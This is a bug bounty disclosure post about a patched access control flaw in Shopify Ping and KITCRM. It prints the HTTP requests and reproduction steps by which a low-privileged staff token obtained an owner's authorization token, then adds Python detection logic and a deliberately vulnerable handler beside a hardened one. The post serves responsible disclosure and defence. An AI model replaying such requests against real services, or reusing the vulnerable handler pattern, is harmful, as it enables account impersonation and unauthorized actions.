Overview
In this blog post, I’ll be walking you through an access control vulnerability I identified in Shopify’s Ping and KITCRM applications. This flaw allowed a low-privileged user to escalate their privileges and impersonate high-privileged users to access and control sensitive conversations with KIT. The impact? Unauthorized access to high-privileged users' communications and the ability to execute tasks on their behalf, making this vulnerability a significant security risk.
What Are Shopify Ping and KIT?
Shopify Ping is a communication tool designed for Shopify users to engage with customers and manage their businesses. One of its integrations is with KIT, a virtual assistant application that can handle tasks like creating discount codes, launching retargeting campaigns, sending thank-you emails, and more.
High-privileged users, like store owners or admins, typically have access to these tools. Low-privileged users, such as staff members with limited permissions, are generally restricted from accessing Shopify Ping and KIT functionalities. However, this vulnerability bypassed these restrictions entirely.
The Bug: Privilege Escalation via KITCRM
The core issue lies in the API endpoints of KITCRM, where a low-privileged user could generate a high-privileged user's KITCRM authorization token using their own Shopify Ping access token. This allowed the low-privileged user to impersonate high-privileged users and access sensitive features and data.
Vulnerable Requests
Vulnerable Request 1: Generate High-Privileged User’s KITCRM Authorization Token
POST /api/v1/arro_token?access_token=LOW_PRIVILEGED_USER_TOKEN&myshopify_domain=yourstore.myshopify.com&id=HIGH_PRIVILEGED_USER_ID HTTP/1.1
Host: www.kitcrm.com
Content-Type: application/json
Connection: close
By providing a valid Shopify Ping access token (from a low-privileged user) and the high-privileged user's staff ID in the id parameter, the response disclosed the high-privileged user's KITCRM authorization token.
Response:
{
"token": "HIGH_PRIVILEGED_USER_AUTHORIZATION_TOKEN"
}
Using this token, the attacker could perform unauthorized actions as a high-privileged user.
Vulnerable Request 2: View High-Privileged User’s Conversations
GET /api/v2/messages HTTP/1.1
Host: www.kitcrm.com
Authorization: Bearer HIGH_PRIVILEGED_USER_AUTHORIZATION_TOKEN
Accept: application/json
This request displayed sensitive communications between the high-privileged user and KIT.
Vulnerable Request 3: Send Messages to KIT
POST /api/v2/messages HTTP/1.1
Host: www.kitcrm.com
Authorization: Bearer HIGH_PRIVILEGED_USER_AUTHORIZATION_TOKEN
Content-Type: application/json
{
"incoming_message": "testtesthai"
}
Using this request, the attacker could send instructions to KIT on behalf of the high-privileged user.
Steps to Reproduce
1. Login as High-Privileged User: Log in to the Shopify Ping application with high-privileged credentials and communicate with KIT.
2. Create a Low-Privileged User: Add a low-privileged user to the Shopify store with no or minimal permissions.
3. Obtain Low-Privileged User’s Access Token: Use the Shopify Ping login API to generate the access token for the low-privileged user.
POST /admin/api/xauth HTTP/1.1
4. Exploit the Vulnerability: Use the low-privileged user’s access token in Vulnerable Request 1 with the high-privileged user’s staff ID. Replay the request using a tool like Burp Suite to obtain the high-privileged user’s KITCRM authorization token.
5. Access Sensitive Conversations: Use the high-privileged user’s token in Vulnerable Request 2 to read communications.
6. Send Instructions to KIT: Leverage Vulnerable Request 3 to send commands on behalf of the high-privileged user.
Impact
This vulnerability had severe implications:
- Unauthorized Access: A low-privileged user could access high-privileged users' communications with KIT.
- Task Manipulation: Attackers could execute tasks on behalf of the high-privileged user, such as creating discount codes, launching campaigns, or sending emails.
- Lack of Auditability: Since all actions were performed under the high-privileged user’s account, tracking the attacker would be challenging.
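The auditability point above cuts both ways: if the gateway in front of the token endpoint logs which staff member each access_token resolved to, the abuse pattern is easy to spot, because the caller's identity and the id parameter disagree. The following is an added example written for this post, not Shopify's or KITCRM's code. The log format (staff_id and role already resolved per line) and the sample lines are constructed assumptions; the endpoint paths and parameter names are the ones shown in the requests above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines for this example. The format is an assumption:
# the gateway has already resolved access_token to the calling staff member
# (staff_id, role) before writing the line; the page itself shows no logs.
SAMPLE_LOG = """\
2020-06-27T10:00:01Z staff_id=1001 role=owner POST /api/v1/arro_token?access_token=tok_owner&myshopify_domain=yourstore.myshopify.com&id=1001
2020-06-27T10:05:12Z staff_id=2002 role=limited_staff POST /api/v1/arro_token?access_token=tok_staff&myshopify_domain=yourstore.myshopify.com&id=1001
2020-06-27T10:05:40Z staff_id=2002 role=limited_staff POST /api/v1/arro_token?access_token=tok_staff&myshopify_domain=yourstore.myshopify.com&id=2002
2020-06-27T10:06:00Z staff_id=1001 role=owner GET /api/v2/messages
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) staff_id=(?P<staff_id>\d+) role=(?P<role>\S+) "
    r"(?P<method>[A-Z]+) (?P<target>\S+)$"
)

# Roles the post says are normally allowed to use Shopify Ping / KIT.
PING_ALLOWED_ROLES = {"owner", "admin"}
TOKEN_ENDPOINT = "/api/v1/arro_token"


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs returns lists; keep the first value of each parameter
    rec["query"] = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return rec


def find_token_minting_mismatches(log_text):
    """Return records where the caller asked for a KITCRM token for a different staff id."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["path"] != TOKEN_ENDPOINT:
            continue
        requested = rec["query"].get("id")
        if requested is not None and requested != rec["staff_id"]:
            hits.append({"ts": rec["ts"], "caller": rec["staff_id"],
                         "requested_id": requested, "role": rec["role"]})
    return hits


def find_low_privilege_ping_usage(log_text):
    """Return records where a role outside PING_ALLOWED_ROLES touched any /api/ endpoint."""
    return [
        {"ts": rec["ts"], "caller": rec["staff_id"], "role": rec["role"], "path": rec["path"]}
        for rec in map(parse_line, log_text.splitlines())
        if rec is not None
        and rec["path"].startswith("/api/")
        and rec["role"] not in PING_ALLOWED_ROLES
    ]


if __name__ == "__main__":
    for hit in find_token_minting_mismatches(SAMPLE_LOG):
        print("token minted for another user:", hit)
    for hit in find_low_privilege_ping_usage(SAMPLE_LOG):
        print("low-privileged role on Ping/KIT API:", hit)
```

The first check catches the exact request shape from Vulnerable Request 1 (caller 2002 asking for id 1001). The second check is broader and corresponds to the first fix listed below: any limited-staff session reaching the Ping/KIT API at all is worth an alert, even when the id matches.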
Recommendations and Fixes
Shopify resolved this issue by implementing:
- Strict Access Control: Ensuring that low-privileged users cannot access Shopify Ping APIs.
- Token Binding: Linking KITCRM authorization tokens to specific user roles to prevent misuse.
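To make the two fixes concrete, here is an added example in Python that places a handler mirroring the flawed behaviour beside a hardened one. This is illustration code written for this post, not Shopify's or KITCRM's implementation; the in-memory session store, the token store, the role names, and the function names are all assumptions. The request parameters (access_token, myshopify_domain, id) are the ones from Vulnerable Request 1.

```python
from dataclasses import dataclass
import secrets


class AuthorizationError(Exception):
    """Raised when a request is denied."""


@dataclass(frozen=True)
class Staff:
    staff_id: int
    shop: str
    role: str  # e.g. "owner", "admin", "limited_staff" (constructed role names)


# Constructed in-memory stand-ins for the Shopify Ping session store and the
# KITCRM token store. These are assumptions for the example only.
PING_SESSIONS = {
    "ping_tok_owner": Staff(1001, "yourstore.myshopify.com", "owner"),
    "ping_tok_staff": Staff(2002, "yourstore.myshopify.com", "limited_staff"),
}
# Legacy store: one KITCRM token per staff id, nothing else recorded about it.
LEGACY_KIT_TOKENS = {1001: "kit_tok_1001", 2002: "kit_tok_2002"}
# Hardened store: token -> the Staff it was issued to (the "token binding").
BOUND_KIT_TOKENS = {}
PING_ALLOWED_ROLES = {"owner", "admin"}


def vulnerable_arro_token(access_token, myshopify_domain, id):
    """Mirrors the flaw described above: any valid Ping session can fetch any staff id's token."""
    if access_token not in PING_SESSIONS:
        raise AuthorizationError("invalid access_token")
    # The id parameter is trusted as-is; the caller's own identity and role are never consulted.
    return {"token": LEGACY_KIT_TOKENS[int(id)]}


def hardened_arro_token(access_token, myshopify_domain, id):
    """Issue a KITCRM token only to the caller, only for an allowed role, bound to that caller."""
    caller = PING_SESSIONS.get(access_token)
    if caller is None:
        raise AuthorizationError("invalid access_token")
    if caller.role not in PING_ALLOWED_ROLES:
        raise AuthorizationError("role may not use Shopify Ping / KIT")
    if caller.shop != myshopify_domain:
        raise AuthorizationError("access_token does not belong to this store")
    if caller.staff_id != int(id):
        # id must equal the authenticated caller's id; it never selects another user.
        raise AuthorizationError("cannot obtain a token for another staff member")
    token = secrets.token_urlsafe(32)
    BOUND_KIT_TOKENS[token] = caller
    return {"token": token}


def hardened_get_messages(bearer_token):
    """Resolve a KITCRM token to its bound principal and re-check the role on every request."""
    principal = BOUND_KIT_TOKENS.get(bearer_token)
    if principal is None or principal.role not in PING_ALLOWED_ROLES:
        raise AuthorizationError("token not bound to a permitted principal")
    # Constructed response; a real service would return that staff member's conversation.
    return {"staff_id": principal.staff_id, "messages": []}


def demo():
    """Summarize how each handler treats the requests from the report."""
    result = {}
    # Legacy behaviour: a limited-staff session fetches the owner's KITCRM token.
    result["vulnerable_leaks_owner_token"] = (
        vulnerable_arro_token("ping_tok_staff", "yourstore.myshopify.com", "1001")["token"]
        == "kit_tok_1001"
    )
    try:
        hardened_arro_token("ping_tok_staff", "yourstore.myshopify.com", "1001")
        result["hardened_denies_staff"] = False
    except AuthorizationError:
        result["hardened_denies_staff"] = True
    try:  # even an owner cannot mint a token for a different staff id
        hardened_arro_token("ping_tok_owner", "yourstore.myshopify.com", "2002")
        result["hardened_denies_other_id"] = False
    except AuthorizationError:
        result["hardened_denies_other_id"] = True
    # The owner still gets a token for themselves, and it works on the messages endpoint.
    owner_token = hardened_arro_token("ping_tok_owner", "yourstore.myshopify.com", "1001")["token"]
    result["owner_can_read_messages"] = hardened_get_messages(owner_token)["staff_id"] == 1001
    return result


if __name__ == "__main__":
    print(demo())
```

The key design point is that the hardened handler derives the principal from the authenticated session and treats id only as something to compare against, never as a selector. Binding the issued token to that principal means the messages endpoint can re-check the role on every call, so a token that leaks by some other route still cannot be used by a role that is not permitted to use Ping/KIT.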
Conclusion
This vulnerability highlights the importance of robust access control mechanisms in applications handling sensitive user data and permissions. By exploiting improper validation in API endpoints, a low-privileged user could compromise the integrity of high-privileged users’ actions.
I’m grateful to Shopify for acknowledging and patching this vulnerability promptly as part of their bug bounty program. This experience reinforces the critical role of security researchers in safeguarding platforms and their users.
Original Report: https://hackerone.com/reports/909863
Timeline
- Report Submission: June 27, 2020
- Acknowledgment: July 2, 2020
- Fix Deployed: August 24, 2020
- Bounty Awarded: 1000 USD on July 6, 2020
Shoutout to Shopify
A huge thanks to Shopify for their well-organized bug bounty program and commitment to user security. If you’re a security researcher, I highly recommend participating in their program!
Founder & CEO @ Appsecure Security